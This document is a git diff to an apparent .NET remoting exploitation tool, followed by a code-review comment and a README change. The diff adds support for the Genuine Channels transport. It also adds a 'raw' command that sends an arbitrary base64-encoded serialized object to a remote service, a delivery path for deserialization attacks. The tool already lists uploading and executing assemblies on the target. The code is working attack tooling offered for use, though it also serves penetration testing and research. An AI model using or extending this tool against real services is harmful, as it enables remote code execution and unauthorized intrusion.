diff --git a/ExploitRemotingService/Program.cs b/ExploitRemotingService/Program.cs
index 6ec92ec..c4ee07c 100644
--- a/ExploitRemotingService/Program.cs
+++ b/ExploitRemotingService/Program.cs
@@ -77,6 +77,7 @@ static void SetupServer()
 switch (_uri.Scheme)
 {
+ case "gtcp":
 case "tcp":
 {
 dict["port"] = _port;
@@ -104,7 +105,7 @@ private static Stream BindStream()
 {
 Stream ret = null;
- if (_uri.Scheme == "tcp")
+ if (_uri.Scheme == "tcp" || _uri.Scheme == "gtcp")
 {
 TcpClient client = new TcpClient();
@@ -234,6 +235,7 @@ static void PrintHelp(OptionSet p)
 run file [args] : Upload and execute an assembly, calls entry point
 user : Print the current username
 ver : Print the OS version
+raw base64_object : Send a raw serialized object to the service
 ");
 }
@@ -675,11 +677,89 @@ private static IRemoteClass CreateRemoteClass()
 return GetExistingRemoteClass();
 }
- }
-
- static object SendRequest(object o, bool remote)
+ }
+
+ public static void WriteLabelledStream(MemoryStream inputStream, Stream outputStream)
+ {
+ MemoryStream stm = new MemoryStream();
+ BinaryWriter writer = new BinaryWriter(stm);
+
+ writer.Write((byte)0x37); // COMMAND_MAGIC_CODE
+ writer.Write((int)inputStream.Length);
+ writer.Write((byte)1); // Finished?
+ writer.Write(inputStream.ToArray());
+
+ outputStream.Write(stm.ToArray(), 0, (int)stm.Length);
+ outputStream.Flush();
+ }
+
+ static object SendRequestGenuineChannel(byte[] data)
+ {
+ using (Stream netStream = BindStream())
+ {
+ MemoryStream stm = new MemoryStream();
+ BinaryWriter writer = new BinaryWriter(stm);
+
+ byte genuineConnectionType = 1;
+
+ //LowLevel_OpenConnection()
+ // MessageCoder.SerializeConnectionHeader()
+ writer.Write((byte)3); // Protocol Version
+ writer.Write((byte)genuineConnectionType);
+ writer.Write("$/__GC/" + _uri.Host); //ConnectionID / ConnectionName
+
+ WriteLabelledStream(stm, netStream);
+
+ stm = new MemoryStream();
+ writer = new BinaryWriter(stm);
+
+ //SendConnectionInfo
+ writer.Write(String.Format("{0}://{1}", _uri.Scheme, Guid.NewGuid())); // LocalUri
+ writer.Write((int) -1); // Undocumented
+ writer.Write(genuineConnectionType);
+ writer.Write((int)2); // LocalHostUniqueIdentifier
+
+ WriteLabelledStream(stm, netStream);
+
+ BinaryReader reader = new BinaryReader(netStream);
+ reader.ReadByte();
+ Int32 length = reader.ReadByte();
+ reader.ReadInt32();
+ String remoteUri = reader.ReadString();
+ Int32 remoteHostUniqueIdentifier = reader.ReadInt32();
+
+ //LowLevel_StartSending()
+ stm = new MemoryStream();
+ writer = new BinaryWriter(stm);
+
+ writer.Write("D"); // basicSecuritySession
+
+ //MessageCoder.Serialize()
+ writer.Write((byte)0); //Compression
+ writer.Write((byte)1); //GenuineMessageType 1
+ writer.Write(2); // MessageID
+ writer.Write(0); // ReplyToId
+ writer.Write((bool)false); // Is OneWay
+ writer.Write((bool)false); // MarshalByRef
+ writer.Write((Int16)0); // SecuritySessionParameters.Attributes
+ writer.Write(String.Empty); // RemoteTransportUser
+
+ // Write ITransportHeaders
+ writer.Write("__RequestUri");
+ writer.Write(_uri.PathAndQuery);
+ writer.Write("Content-Type");
+ writer.Write("application/octet-stream");
+ writer.Write("__"); // headers end tag
+ writer.Write(data);
+
+ WriteLabelledStream(stm, netStream);
+ }
+
+ return null;
+ }
+
+ static object SendRequest(byte[] data)
 {
- byte[] data = SerializeObject(o, remote);
 MemoryStream stm = new MemoryStream();
 BinaryWriter writer = new BinaryWriter(stm);
@@ -712,7 +792,32 @@ static object SendRequest(object o, bool remote)
 return ParseResult(reader);
 }
- }
+ }
+ }
+
+ static object SendRequest(string base64)
+ {
+ if (_uri.Scheme.Equals("gtcp"))
+ {
+ return SendRequestGenuineChannel(Convert.FromBase64String(base64));
+ }
+ else
+ {
+ return SendRequest(Convert.FromBase64String(base64));
+ }
+ }
+
+ static object SendRequest(object o, bool remote)
+ {
+ byte[] data = SerializeObject(o, remote);
+ if (_uri.Scheme.Equals("gtcp"))
+ {
+ return SendRequestGenuineChannel(data);
+ }
+ else
+ {
+ return SendRequest(data);
+ }
 }
 public static T MakeCall(string path, MethodBase mi, params object[] cmdargs)
@@ -925,9 +1030,23 @@ static int Main(string[] args)
 Console.WriteLine("Detected version {0} server", _ver);
 }
- IRemoteClass ret = CreateRemoteClass();
+ if (_cmd.Equals("raw"))
+ {
+ if (_cmdargs.Count != 1)
+ {
+ Console.Error.WriteLine("Must specify base64 encoded object");
+ }
+ else
+ {
+ Console.WriteLine(SendRequest(_cmdargs.First()));
+ }
+ }
+ else
+ {
+ IRemoteClass ret = CreateRemoteClass();
- ExecuteCommand(ret);
+ ExecuteCommand(ret);
+ }
 }
 catch (Exception ex)
 {
@@ -939,7 +1058,7 @@ static int Main(string[] args)
 else
 {
 return 1;
- }
- }
+ }
+ }
 }
 }
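Review bot: The reply header read in SendRequestGenuineChannel (`reader.ReadByte(); Int32 length = reader.ReadByte(); reader.ReadInt32();`) does not mirror the byte/int/byte layout that WriteLabelledStream emits; it happens to consume the same six bytes, so the following ReadString stays aligned, but `length` then holds only the low byte, and `length`, `remoteUri` and `remoteHostUniqueIdentifier` are never used. If the reply is framed like WriteLabelledStream, `Int32 length = reader.ReadInt32(); reader.ReadByte(); // finished flag` after the magic byte reads the intended values; otherwise the unused locals should be dropped. The method always returns null without reading past the last WriteLabelledStream, so the `raw` branch in the Main hunk prints an empty line for gtcp while the tcp path returns ParseResult; a `/// <returns>Always null; no reply is consumed.</returns>` on it would make that explicit. The scheme test `_uri.Scheme.Equals("gtcp")` is now repeated in both new SendRequest overloads as well as SetupServer and BindStream, and a single `static bool IsGenuineChannel => _uri.Scheme == "gtcp";` would keep them in step. In the Main hunk the `_cmdargs.Count != 1` branch reports the error to stderr but appears to continue on the normal exit path rather than returning 1, and Convert.FromBase64String throws FormatException on malformed input, which the surrounding catch (Exception) presumably reports like any other failure.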
diff --git a/README.md b/README.md
index 04a67c9..22fc931 100644
--- a/README.md
+++ b/README.md
@@ -44,6 +44,7 @@ ls remotedir : List a remote directory
 run file [args] : Upload and execute an assembly, calls entry point
 user : Print the current username
 ver : Print the OS version
+raw base64_object : Send a raw serialized object to the service
 This tool supports exploit both TCP remoting services and local IPC services. To test